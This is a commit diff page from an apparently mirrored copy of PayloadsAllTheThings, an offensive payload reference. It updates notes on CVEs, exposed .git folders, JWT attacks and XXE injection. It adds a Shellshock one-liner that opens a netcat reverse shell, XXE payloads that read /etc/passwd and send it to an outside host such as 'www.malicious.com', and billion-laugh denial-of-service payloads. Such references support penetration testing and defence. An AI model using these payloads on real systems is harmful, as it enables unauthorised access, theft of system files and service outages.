ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Attacks details + Summary JWT + XXE adjustments

Browse Source
This commit is contained in:
Swissky 2018-11-26 00:25:06 +01:00
parent 928a454531
commit 521d61d956
4 changed files with 47 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
CVE Exploits/README.md
View File

@ -1,16 +1,29 @@
# Common Vulnerabilities and Exposures # Common Vulnerabilities and Exposures
Big CVEs in the last 5 years. Big CVEs in the last 5 years.
## CVE-2014-0160 - Heartbleed ## CVE-2014-0160 - Heartbleed
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
## CVE-2014-6271 - Shellshock ## CVE-2014-6271 - Shellshock
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
```bash
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
```
## CVE-2017-5638 - Apache Struts 2 ## CVE-2017-5638 - Apache Struts 2
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
## CVE-2018-7600 - Drupalgeddon 2
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
## Thanks to ## Thanks to
* http://heartbleed.com
* https://en.wikipedia.org/wiki/Shellshock_(software_bug) * [Heartbleed - Official website](http://heartbleed.com)
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/) * [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)

10
Insecure source code management/README.md
View File

@ -16,10 +16,16 @@
The following examples will create either a copy of the .git or a copy of the current commit. The following examples will create either a copy of the .git or a copy of the current commit.
Check for the following files, if they exist you can extract the .git folder.
- .git/config
- .git/HEAD
- .git/logs/HEAD
### Github example with a .git ### Github example with a .git
1. Check 403 error (Forbidden) for .git or even better : directory listing 1. Check 403 error (Forbidden) for .git or even better : a directory listing
2. Git saves all informations in log file .git/logs/HEAD (try 'head' too) 2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
```powershell ```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial. 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.

6
JSON Web Token/README.md
View File

@ -2,6 +2,11 @@
> JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
- JWT Format
- JWT Signature - None algorithm
- JWT Signature - RS256 to HS256
- Breaking JWT's secret
## JWT Format ## JWT Format
JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)` JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)`
@ -139,3 +144,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
- [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec) - [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
- [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/) - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
- [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)

25
XXE injection/README.md
View File

@ -1,10 +1,11 @@
# XML External Entity # XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities.
XML entities can be used to tell the XML parser to fetch specific content on the server.
## Exploit ## Exploit
Basic Test Basic XML external entity test, the result should contain "John" in `firstName` and "Doe" in `lastName`.
```xml ```xml
<!--?xml version="1.0" ?--> <!--?xml version="1.0" ?-->
@ -67,14 +68,16 @@ Classic XXE Base64 encoded
<?xml version="1.0" encoding="ISO-8859-1"?> <?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
<!ELEMENT foo ANY > <!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" > <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
]> ]>
<foo>&xxe;</foo> <foo>&xxe;</foo>
``` ```
## Deny of service ## Deny of service
Deny Of Service - Billion Laugh Attack **Warning** : These attacks will disable the service or the server, do not use them on the Prod.
Billion Laugh Attack
```xml ```xml
<!DOCTYPE data [ <!DOCTYPE data [
@ -103,8 +106,12 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
## Blind XXE - Out of Band ## Blind XXE - Out of Band
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
### Blind XXE ### Blind XXE
Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
```xml ```xml
<?xml version="1.0" encoding="ISO-8859-1"?> <?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
@ -146,13 +153,17 @@ File stored on http://127.0.0.1/dtd.xml
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
``` ```
### XXE Inside SOAP ### XXE inside SOAP
```xml ```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> <soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>
``` ```
### XXE Inside DOCX file ### XXE inside DOCX file
Format of an Open XML file (inject the payload in any .xml file): Format of an Open XML file (inject the payload in any .xml file):